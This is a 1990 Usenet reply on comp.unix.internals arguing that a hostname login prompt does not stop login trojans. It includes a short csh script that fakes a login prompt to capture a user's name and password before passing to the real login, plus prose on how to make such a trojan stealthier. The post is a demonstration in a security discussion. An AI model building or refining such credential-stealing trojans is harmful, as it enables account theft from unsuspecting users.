Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!uwm.edu!archimedes.math.uwm.edu!jgreco
From: jgreco@archimedes.math.uwm.edu (Joe Greco)
Newsgroups: comp.unix.internals
Subject: Re: Finding Passwords
Keywords: security
Message-ID: <6772@uwm.edu>
Date: 5 Oct 90 01:10:19 GMT
References: <8354@helios.TAMU.EDU> <11133@galbp.LBP.HARRIS.COM> <LUSH.90Sep21083625@athena0.EE.MsState.Edu> <50845@brunix.UUCP>
Sender: news@uwm.edu
Organization: University of Wisconsin, Milwaukee - Department of Mathematics
Lines: 45

In comp.unix.internals article <50845@brunix.UUCP>, cgy@cs.brown.edu (Curtis Yarvin) wrote:
:You should be able to prevent this.  SunOS (and thus likely BSD as well,
:though I don't know) make the first login prompt "<hostname> login:", and
:switch to plain "login:" if an incorrect password is entered.  This disables
:login trojans by making them unconcealable.  Alternatively, on at least some
:SysV machines, you can change the first prompt from the soft underbelly of
:"login:" by mucking with /etc/gettydefs (I think /etc/gettytab on BSD is the
:same).

Well, I whipped up the following in about 15 seconds (thought-time that is):
this works very nicely under BSD 4.3.


#!/bin/csh
echo `hostname` " - Dept of Mathematics - U.W. Milwaukee"
echo -n "(tty01) login: "
set name=$<
echo -n "Password ... if you dare: "
set passwd=$<
echo Login incorrect
exec /bin/login

Now, a real program would be written in C, block all signals, turn off tty
echo during the password entry...  as a matter of fact, you could just get
login.c itself and gut it.  Then you could even (easily) make it check the
password.  The ideal trojan would probably wait until a valid user/pass
combination was entered before passing off to the Real Thing.

It's always a good idea to not log onto a terminal that's already on....
that's the way this kind of stuff is prevented at UWM, for the most part.
That's not always possible at other sites.  :-(

Disclaimer: I am neither a subversive nor an account cracker.  I was just
showing a practical example to disprove the above statement.

... Joe

-------------------------------------------------------------------------------
Joe Greco - University of Wisconsin, Milwaukee - Department of Mathematics
jgreco@archimedes.math.uwm.edu		USnail: Joe Greco
Voice: 414/321-6184				9905 W. Montana Ave.
Data:  414/321-9287 (Happy Hacker's BBS) 	West Allis, WI  53227-3329
ICBM:  43 05 20 N 87 53 10 W
#include <witty_and_humorous_saying.h>
Disclaimer: I don't speak for the Math Department, the University, or myself.